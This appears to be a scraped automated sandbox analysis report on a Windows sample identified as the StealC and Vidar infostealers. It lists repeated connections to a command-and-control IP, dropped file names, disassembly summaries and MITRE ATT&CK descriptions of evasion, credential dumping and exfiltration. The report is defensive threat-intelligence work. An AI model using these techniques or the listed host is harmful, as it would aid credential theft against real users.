Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.37

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AKECBFBAEBKJJJJKFCGC

C:\ProgramData\CBGCAFII

C:\ProgramData\CBGCAFIIECBFIDHIJKFB

C:\ProgramData\DAKEBAKFHCFHIEBFBAFBKFCAEH

C:\ProgramData\DHCAECGI

C:\ProgramData\EBFBKFBGIIIDGDGCFCGIIDAKFC

C:\ProgramData\HCFIIIJJKJKFHIDGDBAKJEBKEG

C:\ProgramData\HIDHDGDHJEGHIDGDHCGCBAKFHI

C:\ProgramData\KEBGHCBAEGDHIDGCBAEC

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

Windows Analysis Report
file.exe

Function 00559860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212
libraryloaderCOMMON

Function 005445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148
memoryCOMMON

Function 0054BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675
fileCOMMON

Function 6C6535A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Function 00554910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Function 00544880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Function 00559C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Function 00547710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Function 00550250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre